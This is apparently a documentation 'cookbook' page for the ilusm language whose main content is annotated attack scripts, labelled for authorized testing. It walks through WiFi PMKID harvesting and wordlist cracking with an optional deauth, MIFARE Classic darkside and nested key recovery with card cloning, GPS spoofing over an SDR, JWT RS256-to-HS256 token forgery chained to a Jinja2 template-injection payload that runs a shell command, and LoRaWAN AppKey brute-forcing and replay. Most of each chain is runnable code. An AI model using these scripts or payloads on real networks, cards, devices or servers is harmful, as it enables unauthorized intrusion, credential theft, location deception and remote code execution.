ilusm.dev
Cookbook

Cookbook

Two tracks: learning examples (small runnable programs, domain snippets, SVG showcases) mirrored from the language repo, and security recipes below-annotated attack chains for authorized testing only. Steps marked ★ native need a local install and hardware where noted.

Learn

Language demos (release/examples/)

The official demo scripts shipped with the language: one main idea per .ilu-hello world, stdlib domains, category composites, SVG output, telemetry-each browsable as raw source in the mirror.
Stdlib

Domain snippets + recorded output

One tiny program per module family with golden transcripts from the reference interpreter (regenerate from the repo when you upgrade ./ilusm).
Tour

Loveshack interactive tutorial

Step-through introduction in the browser before you clone the full tree.
Authorization required (security section below). Attack-chain recipes are for authorized security testing only - on systems you own or have explicit written permission to test. Unauthorized use is illegal. These scripts are educational; ilusm contributors bear no responsibility for misuse.

Security recipes

Jump to a chain or scroll for full annotated scripts.

WiFi

WiFi: scan → PMKID crack

Passive PMKID harvest and offline cracking.
NFC

NFC cloning + MIFARE darkside

Recover MIFARE keys via darkside and nested auth.
GPS

GPS spoofing during physical pentest

Spoof GPS location via host syscall interface.
Web

JWT key confusion + RCE

Algorithm confusion attack leading to RCE.
LoRa/RFID

LoRaWAN gateway + packet capture

Gateway simulation, packet decoding, MIC verification.

WiFi: scan → PMKID crack ★ native + hardware

WiFi wf · obs · trl · fs · cry · txt · tim
Why ilusm makes this easy: The wf module wraps WiFi 802.11 operations including scanning, PMKID harvest, and cracking. crypb + cryhm give you the PMKID derivation. trl handles list operations cleanly.
  1. Passive scan - collect beacons, record BSSID/SSID/channel for each AP.
  2. PMKID harvest - send a single association request to each AP; the first EAPOL frame contains the PMKID. No client needed.
  3. Optional deauth - if you want a full 4-way handshake instead, deauth a connected client and capture the re-association.
  4. Offline crack - for each candidate password, derive PMK → PMKID and compare against the captured value.
# ── Stage 1: passive scan ────────────────────────────────────── use wf use obs use trl use fs use cry use txt use tim # Put wireless interface into monitor mode first: # ip link set wlan0 down # iw dev wlan0 set type monitor # ip link set wlan0 up scan_aps(iface, secs) = obs.info("Scanning " + iface + " for " + str(secs) + " seconds") h = wfiop(iface) wfimo(h) aps = wfisc(h, secs) wficl(h) # Filter to WPA2 targets only trl.fil(aps, \(ap) ofld(ap, "crypto") == "WPA2") aps = scan_aps("wlan0", 15) obs.info("Found " + str(len(aps)) + " WPA2 APs") # ── Stage 2: PMKID harvest ───────────────────────────────────── # Send one association request per AP; grab the PMKID from EAPOL msg 1. # PMKID = HMAC-SHA1(PMK, "PMK Name" || AP_MAC || STA_MAC)[0:16] harvest_pmkid(iface, ap) = bssid = ofld(ap, "bssid") obs.info("Harvesting PMKID from " + bssid) h = wfiop(iface) wfimo(h) result = wfipm(h, bssid, 10) wficl(h) result pmkids = trl.fil( trl.map(aps, \(ap) harvest_pmkid("wlan0", ap)), \(r) r != nil ) obs.info("Harvested " + str(len(pmkids)) + " PMKIDs") # ── Stage 3: optional deauth (forces full handshake) ─────────── # Only needed if you want the 4-way handshake instead of PMKID. # wfise3(h, bssid, client_mac, 3) # deauth with reason 3 # cap = wfica(h, bssid, 30) # capture handshake # ── Stage 4: offline PMKID crack ─────────────────────────────── # For each candidate password: PMK = PBKDF2(pw, ssid, 4096, 32) # Then: PMKID = HMAC-SHA1(PMK, "PMK Name" || ap_mac || sta_mac)[0:16] crack_pmkid(target, ssid, wordlist_path) = data = fs.rd(wordlist_path) words = txt.spl(data, "\n") obs.info("Testing " + str(len(words)) + " passwords against " + ofld(target, "ap_mac")) found = nil i = 0 whl i < len(words) and found == nil pw = words[i] pmk = crypb(pw, ssid, 4096, 32) # PMKID derivation per IEEE 802.11i data = "PMK Name" + ofld(target, "ap_mac") + ofld(target, "sta_mac") pmkid = cry.hmc(pmk, data) # Compare first 16 bytes (32 hex chars) if txt.sub(pmkid, 0, 32) == ofld(target, "pmkid"): found = pw i = i + 1 found # Run against each harvested PMKID trl.eac(pmkids, \(target) ap = trl.fnd(aps, \(a) ofld(a, "bssid") == ofld(target, "ap_mac")) ssid = if ap != nil: ofld(ap, "ssid") | "unknown" pw = crack_pmkid(target, ssid, "rockyou.txt") if pw != nil: obs.warn("CRACKED: " + ssid + " -> " + pw) | obs.info("Not in wordlist: " + ssid) )

NFC cloning + MIFARE darkside attack ★ native + hardware

NFC nfc · cry · bin · log · fs · trl
Why ilusm makes this easy: nfc wraps libnfc and provides a clean API over the raw APDU layer. The MIFARE CRYPTO1 key recovery is a known algorithm - cry gives you the XOR and bit-manipulation primitives. The whole attack fits in ~60 lines.
  1. Read the UID (always possible, even on locked cards).
  2. Try default keys (0xFFFFFFFFFFFF, 0x000000000000) - works on ~40% of deployed cards.
  3. Run the darkside attack - exploit the CRYPTO1 PRNG weakness to recover the first sector key without knowing any key.
  4. Use nested authentication to recover all remaining sector keys from the first known key.
  5. Dump all 64 blocks and write to a blank MIFARE Classic card.
# ── Step 1: read UID ─────────────────────────────────────────── use nfc use cry use enc use obs use fs use trl use jsn dev = nfcop("/dev/ttyUSB0") card = nfcpo(dev, 5000) uid = nfcui(dev) typ = nfcty(dev) obs.info("UID: " + enc.hex(uid) + " type: " + typ) # ── Step 2: try default keys ─────────────────────────────────── # Use built-in crack function that tries common keys result = nfccr(dev, 0) if ofld(result, "found"): s0_key = ofld(result, "key") obs.info("sector 0 key found via crack") | s0_key = nil # ── Step 3: darkside attack (if crack fails) ──────────────────── # Exploits CRYPTO1 PRNG - sends malformed auth to leak keystream bits. if s0_key == nil: obs.info("running darkside attack on sector 0...") s0_key = cndar(dev, 0) obs.warn("darkside recovered key: " + s0_key) # ── Step 4: nested authentication - recover all sector keys ──── # With one known key, nested auth leaks the PRNG state for other sectors. recover_all_keys(dev, known_sector, known_key) = keys = {} keys[known_sector] = known_key i = 0 whl i < 16 # MIFARE Classic 1K has 16 sectors if keys[i] == nil: k = nfcda(uid, i, known_key) if k != nil: keys[i] = k obs.info("sector " + str(i) + " key recovered") i = i + 1 keys all_keys = recover_all_keys(dev, 0, s0_key) # ── Step 5: dump all blocks and clone ────────────────────────── # Use built-in dump function dump = nfcdu(dev) fs.wr("card-dump.bin", jsn.enc(dump)) obs.info("dumped card to card-dump.bin") # Write to blank card (place blank card on reader) # nfccl1(dev, "new_card_target")

GPS spoofing during physical pentest ★ native + hardware + SDR

GPS gps · log · trl · tim
Why ilusm makes this easy: gps provides spoofing init, position setting, and start/stop control via host syscalls. You describe a route as a list of coordinates and ilusm handles the NMEA generation and timing.
  1. Define the spoofed route - a list of {lat, lon, alt, speed} waypoints.
  2. Initialize GPS spoofing handle via host syscall.
  3. Walk the route, setting position and transmitting at 1 Hz.
  4. Stop spoofing and verify the target device reports the spoofed location.
# GPS spoofing - requires host with GPS spoofing hardware support # Legal only on your own devices in a shielded environment # or with explicit authorization from the target organization use gps use obs use trl use tim # Define the spoofed route (e.g. fake a device moving through a building) route = [ {lat: 37.7749, lon: -122.4194, alt: 10.0, speed: 0.0}, # start {lat: 37.7750, lon: -122.4190, alt: 10.0, speed: 1.2}, # walking {lat: 37.7752, lon: -122.4185, alt: 10.0, speed: 1.4}, {lat: 37.7755, lon: -122.4180, alt: 10.0, speed: 0.0} # stop ] # Initialize GPS spoofing handle (host syscall) h = gpspo() obs.info("GPS spoof handle initialized") # Walk the route, transmitting one fix per second trl.eac(route, \(fix) # Set the spoofed position gpspo1(h, fix.lat, fix.lon, fix.alt) # Generate fake NMEA GGA sentence for logging/verification nmea = gpsfa(fix.lat, fix.lon, fix.alt, 8) obs.info($"spoofed: {fix.lat},{fix.lon}") # Wait 1 second between fixes tim.slp(1) ) # Stop spoofing gpsst1(h) obs.info("spoof complete") # Detection note: modern receivers check for signal strength anomalies, # sudden position jumps, and cross-check with cell/WiFi positioning. # Countermeasure: use multi-constellation receivers (GPS + GLONASS + Galileo).

JWT key confusion + RCE via template injection

Web jwt · net · json · enc · trl · log · cry
Why ilusm makes this easy: jwt exposes the raw header/payload manipulation needed for algorithm confusion. net handles the HTTP chain. The attack is a multi-step chain - ilusm's pipe-friendly style lets you compose each step as a function and chain them cleanly.
  1. Fetch the server's JWKS endpoint to get the RS256 public key.
  2. Forge a JWT signed with HS256 using the public key as the HMAC secret (RS256→HS256 confusion).
  3. Use the forged token to access an admin endpoint.
  4. Identify a template engine in the admin panel (e.g. Jinja2, Pebble).
  5. Inject a SSTI payload to achieve RCE.
use jwt use net use jsn use enc use obs use cry use txt target = "https://api.example.com" # ── Step 1: fetch public key from JWKS ───────────────────────── jwks_resp = net.get(target + "/.well-known/jwks.json") jwks = jsn.dec(jwks_resp.body) pub_key = ofld(jwks, "keys")[0] obs.info($"fetched public key kid={ofld(pub_key, \"kid\")}") # ── Step 2: RS256 → HS256 key confusion ──────────────────────── # Parse existing RS256 token and convert to HS256 # jwtrs() returns {msg, hint} where msg can be signed with public key as HMAC secret original_token = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9..." result = jwtrs(original_token) obs.info($"RSA to HMAC conversion hint={ofld(result, \"hint\")}") # Build forged token with admin claims forged_header = {alg: "HS256", typ: "JWT"} forged_payload = { sub: "admin", role: "superadmin", iat: tim.ms() / 1000, exp: (tim.ms() / 1000) + 3600 } # Sign with public key as HMAC secret (key confusion attack) forged_token = jwtbu(forged_header, forged_payload, pub_key, "HS256") obs.info("forged token created") # ── Step 3: access admin endpoint with forged token ──────────── admin_resp = net.get_hdr( target + "/api/admin/users", {Authorization: "Bearer " + forged_token} ) if ofld(admin_resp, "status") == 200: obs.warn("VULNERABLE: RS256/HS256 confusion accepted") | obs.info($"not vulnerable status={ofld(admin_resp, \"status\")}") # ── Step 4: identify template engine ─────────────────────────── # Try SSTI probe payloads in a user-controlled field SSTI_PROBES = [ {payload: "{{7*7}}", engine: "Jinja2/Twig", expect: "49"}, {payload: "${7*7}", engine: "Freemarker", expect: "49"}, {payload: "<%= 7*7 %>", engine: "ERB/EJS", expect: "49"}, {payload: "#{7*7}", engine: "Ruby/Pebble", expect: "49"} ] detected_engine = nil trl.eac(SSTI_PROBES, \(probe) resp = net.post_hdr( target + "/api/profile", jsn.enc({name: ofld(probe, "payload")}), "application/json", {Authorization: "Bearer " + forged_token} ) if txt.has(ofld(resp, "body"), ofld(probe, "expect")) and detected_engine == nil: detected_engine = ofld(probe, "engine") obs.warn($"SSTI detected engine={detected_engine}") ) # ── Step 5: RCE via Jinja2 SSTI ──────────────────────────────── if detected_engine == "Jinja2/Twig": rce_payload = "{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].decode()}}" rce_resp = net.post_hdr( target + "/api/profile", jsn.enc({name: rce_payload}), "application/json", {Authorization: "Bearer " + forged_token} ) obs.warn($"RCE output: {ofld(rce_resp, \"body\")}")

LoRaWAN gateway simulation + packet capture ★ native + hardware

LoRa/RFID lora · cry · bin · txt · trl · obs
Why ilusm makes this easy: The lora module provides gateway simulation (start/stop/receive/send) and packet decoding. cry handles MIC verification and key derivation. trl manages list operations for filtering and processing packets.
  1. Start LoRaWAN gateway on target frequency with spreading factor.
  2. Receive and decode LoRaWAN packets (join requests, data up/down).
  3. Verify MIC with network key to validate packets.
  4. Optional: brute-force AppKey from captured join request with known plaintext.
  5. Optional: replay attack by modifying frame counter.
# ── Stage 1: Start gateway ────────────────────────────────────── use lora use obs use trl use cry use txt # Start gateway on EU868 frequency (868.1 MHz) with SF7 h = lorag(868.1, 7, 125) obs.info("Gateway started") # ── Stage 2: Receive and decode packets ─────────────────────── # Receive packets with 5 second timeout pkt = lorag2(h, 5000) if pkt != nil: decoded = lorad(pkt) obs.info($"Packet received: {ofld(decoded, \"mtype_str\")} mhdr={ofld(decoded, \"mhdr\")}") | obs.info("No packet received") # ── Stage 3: MIC verification ───────────────────────────────── nwk_key = "00112233445566778899aabbccddeeff" if pkt != nil: valid = lorav(pkt, nwk_key) if valid: obs.info("MIC valid - packet authenticated") | obs.warn("MIC invalid - packet may be tampered") # ── Stage 4: Join request brute-force (if captured) ───────────── # Requires known plaintext from captured join request brute_appkey(deveui, appeui, devnonce, known_plaintext, wordlist) = wl = txt.spl(fs.rd(wordlist), "\n") i = 0 whl i < len(wl) key = wl[i] jr = loraf(deveui, appeui, key, devnonce) if txt.idx(jr, known_plaintext) >= 0 {found: tru, appkey: key} i = i + 1 {found: fls} # ── Stage 5: Replay attack (modify frame counter) ────────────── replay_attack(captured_pkt, new_fcnt) = loraf2(captured_pkt, new_fcnt) # ── Stage 6: Spreading factor scan ─────────────────────────────── scan_sf(h, freq) = sfs = [7, 8, 9, 10, 11, 12] found = [] i = 0 whl i < len(sfs) r = lorag2(h, 2000) if r != nil sf = ofld(r, "sf") if !trl.has(found, sf): found = trl.cat(found, [sf]) i = i + 1 found # ── Stage 7: Stop gateway ─────────────────────────────────────── lorag1(h) obs.info("Gateway stopped")
← Security overview Stdlib catalog →